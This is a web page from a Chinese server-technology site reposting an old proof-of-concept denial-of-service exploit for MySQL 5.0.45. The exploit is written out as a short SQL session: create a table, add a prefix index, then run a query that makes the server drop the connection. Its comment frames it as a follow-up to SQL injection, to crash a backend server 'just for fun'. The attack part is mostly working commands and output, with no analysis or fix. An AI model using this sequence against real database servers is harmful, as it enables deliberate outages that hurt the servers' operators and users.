服务器之家:专注于服务器技术及软件下载分享
分类导航

Mysql|Sql Server|Oracle|Redis|

服务器之家 - 数据库 - Mysql - mysql 5.0.45 (修改)拒绝服务漏洞

mysql 5.0.45 (修改)拒绝服务漏洞

2019-11-08 15:22mysql教程网 Mysql

mysql 5.0.45 (修改)拒绝服务漏洞的方法,追求安全的朋友可以参考下。

mysql 5.0.45 (修改)拒绝服务漏洞 
/* 
* MySQL <=6.0 possibly affected 
* Kristian Erik Hermansen 
* Credit: Joe Gallo 
* You must have Alter permissions to exploit this bug! 
* Scenario: You found SQL injection, but you want to punch backend server 
* in the nuts just for fun. Start with the Alter TABLE statement on 
* a table and field you know to exist. The first two SQL statements are 
* simply to demostrate reproducibility... 
*/ 

<snip> 
mysql> Create TABLE `test` ( 
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, 
`foo` text NOT NULL 
) ENGINE=InnoDB DEFAULT CHARSET=latin1; 
Query OK, 0 rows affected 

mysql> Select * FROM test Where CONTAINS(foo, ''bar''); 
Empty set 

mysql> Alter TABLE test ADD INDEX (foo(100)); 
Query OK, 0 rows affected 
Records: 0 Duplicates: 0 Warnings: 0 

mysql> Select * FROM test Where CONTAINS(foo, ''bar''); 
ERROR 2013 : Lost connection to MySQL server during query 
</snip>

  • mysql
  • 拒绝服务漏洞

    • 延伸 · 阅读

    精彩推荐
    最近更新
    编辑推荐
    阅读排行
    热门标签
    1862   1045   1067   mysql 5.7   修改密码   wamp   实时备份   自动删除   记录   并行复制   load   1290错误   区间   重置密码   I/O错误   group_concat   MySQL5.7.22   CentO7   密码登录   无感知   删除表   触发器   when   Metadata   Lock   提取   taskeng.exe   配置参数   忘记   开销  
    © 2019-2025 服务器之家 版权所有 www.zzvips.com 关于我们联系我们版权申明网站地图